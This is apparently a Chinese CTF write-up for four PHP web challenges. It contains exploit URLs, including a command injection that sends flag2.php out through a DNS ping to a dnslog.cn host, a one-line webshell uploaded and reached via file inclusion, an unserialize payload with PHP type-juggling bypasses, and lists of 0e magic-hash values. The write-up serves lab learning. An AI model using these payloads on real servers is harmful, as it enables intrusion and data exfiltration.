web 01
本题思路:
1.php特性
2.没有过滤extract,可以进行变量覆盖
3.DNSlog获取内容
php特性:当参数中有 . 、+ 、[ 、时,会被转换为_,而当 [被转换为下划线之后,后面的就会保持原样,每一个参数只会转换一次。
exp:
ygnn[bpkn=1&ygnn[bpkn.COM=1&fun=extract($_POST)&fl0g=flag_give_me //得到前半个flag
通过查看robots.txt我们可以看到有MQ==.php文件
通过DNSlog来获得flag2.php中的内容
exp:
http://114.115.207.198:200/MQ==.php?F=`$F`; ping `cat flag2.php|tr -cd "[!-~]"`.6xcy7i.dnslog.cn -c 1
ps:ip随机 筛查范围[!-~]即ASCII码的最大范围
要选择有大写字母的这一串base64编码,小写的解出来是乱码
最后解码拼接即可获得flag
web 02
本题思路:
1.文件上传
2.文件包含
本题没有任何上传文件限制,因为不管上传什么文件都会被更改为.jpg文件,与此同时我们可以获得上传路径
所以我们传一个.phtml文件,里面写入一句话木马,获得路径之后再利用文件包含
exp:
http://114.115.207.198:100/index.php?file=uploads/611093fc298d7.jpg
之后连接蚁剑获得一串base32编码
之后再进行hex解码即可获得flag
web 07
<?php
highlight_file(__FILE__);
$v1=0;$v2=0;$v3=0;$v4=0;
$a=(array)unserialize(@$_GET['foo']); //a是一个数组并且对变量foo进行了反序列化
if(is_array($a)){
is_numeric(@$a["param1"])?die("nope"):NULL; //判断 a["param1"]不能是数字
if(@$a["param1"]){
($a["param1"]>2017)?$v1=1:NULL; //a["param1"]的值要比2017大,我们可以采用数字+字母的形式绕过(数组绕过)如果是一个整形和一个其他类型比较会强制intval。
}
if(is_array(@$a["param2"])){ //a["param2"]是数组
if(count($a["param2"])!==5 OR !is_array($a["param2"][0])) die("nope"); //数组的长度为5,且a["param2"][0]为数组
$pos = array_search("nudt", $a["param2"]);
$pos===false?die("nope"):NULL;
foreach($a["param2"] as $key=>$val){
$val==="nudt"?die("nope"):NULL; //与nudt进行比较,如果a["param2"]中的每一位是数字那么就会出现intval(nudt)=0,所以数组中的数字都为0即可绕过
}
$v2=1;
}
}
$c=@$_GET['egg'];
$d=@$_GET['fish'];
if(@$c[1]){
if(!strcmp($c[1],$d) && $c[1]!==$d){ //egg[1]与fish进行比较即array和string用strcmp比较的时候会返回null
eregi("M|n|s",$d.$c[0])?die("nope"):NULL; //eregi()可以用%00进行截断绕过
strpos(($c[0].$d), "MyAns")?$v3=1:NULL; //egg[0]中要包括MyAns
}
}
$e = $_GET['e'];
$f = $_GET['f'];
$good = false;
if (sha1($e)===sha1($f) && $e !== $f) { //sha1函数处理数组时会返回NULL,所以只要这两个参数都为数组,返回值都为0,0===0
$good = true;
}
else die('bypass');
if ($good && isset($_GET['key'])){
include "key.php";
$message = json_decode($_GET['key']); //{"key":0}因为不知道key的值为多少,我们可以用0=xxxx进行绕过
if ($message->key==$key) {
$v4=1;
}
}
if($v1 && $v2 && $v3 && $v4){
include "flag.php";
echo $flag;
}
?>
eregi()
int eregi(string pattern, string string, [array regs]);
eregi()函数在一个字符串搜索指定的模式的字符串。搜索不区分大小写。
strpos
strpos(string,find,start)
strpos() 函数查找字符串在另一字符串中第一次出现的位置。
综上所述,exp为:
http://39.105.129.189:8087/?foo=a:2:{s:6:"param1";s:5:"2018a";s:6:"param2";a:5:{i:0;a:0:{}i:1;i:0;i:2;i:0;i:3;i:0;i:4;i:0;}}&egg[1][]=1&egg[0]=%00MyAns&fish=1&e[]=1&f[]=2&key={"key":0}
这道题我卡在了反序列化上,param2的值没有搞好。。。
附上大佬的反序列化代码
<?php
$a=array();
$a['param1']="2018a";
$a['param2']=array(array(),0,0,0,0);
echo serialize($a);
?>
web 08
这道题的前半部分与web 01的后半部分一致这里就不做赘述
经过robots.txt可以得到Yahoo.php
<?php
error_reporting(0);
highlight_file(__FILE__);
include("yesYes.php");
$a=$_GET['A_b.c.d_D'];
$b=$_POST['B_c_d.e.E'];
if(isset($_GET['A_b.c.d_D'])&&isset($_POST['B_c_d.e.E'])) //传参这里注意需要进行一次替换即用“[”替换“_”
{
if(!preg_match("/.+?aa/i",$a))
{
if(sha1($a)==md5($b)) //通过0e绕过,即经过md5和sha1函数处理之后是0e开头的即可
{
echo $flag;
}
}
else
{
die("aa is Bad");
}
}
else
{
die("Put Where??");
}
?> 有时多一些碰运气的尝试也可以得到答案Put Where??
在php中0e会被当做科学计数法,即使后面有字母,其结果也是0
以下值在md5加密后以0E开头:
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
s214587387a
以下值在sha1加密后以0E开头:
sha1(‘aaroZmOk’)
sha1(‘aaK1STfY’)
sha1(‘aaO8zKZF’)
sha1(‘aa3OFF9m’)
一开始我想的是通过数组绕过,but不太行~~
exp:
get:http://167.160.189.2:8088/Yahoo.php?A[b.c.d_D=aaroZmOk
post:B[c_d.e.E=QNKCDZO